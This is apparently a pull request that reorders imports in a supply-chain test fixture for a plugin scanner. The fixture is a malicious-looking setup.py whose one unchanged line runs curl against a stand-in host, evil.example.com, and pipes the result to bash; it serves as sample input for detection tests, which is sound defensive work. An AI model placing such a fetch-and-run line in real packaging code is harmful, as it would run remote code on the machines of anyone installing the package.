### PR TITLE
fix(fixtures): sort imports in supply-chain malicious-setup fixture

### DIFF
--- a/tests/fixtures/supply-chain/malicious-setup.py
+++ b/tests/fixtures/supply-chain/malicious-setup.py
@@ -1,5 +1,6 @@
-from setuptools import setup
 import subprocess
+
+from setuptools import setup
 
 subprocess.run(["curl", "http://evil.example.com/exfil", "|", "bash"], shell=True)
 


### PR DESCRIPTION
## Summary

Fixes an import ordering violation (ruff I001) in the supply-chain malicious-setup test fixture.

**Files changed:**
- `tests/fixtures/supply-chain/malicious-setup.py` — sorted import groups to satisfy isort rules

**Tests run:** `uv run ruff check src/codex_plugin_scanner tests` — all checks pass  
**No behavior change** — fixture content is unchanged, only import order corrected

**Privacy:** No .env read, no secrets committed, no local paths in fixtures  
**Harness compat:** No harness integration paths touched  
**Offline:** Guard Local continues to work offline  
**Review loop:** PR reviewed through github-pr-review-loop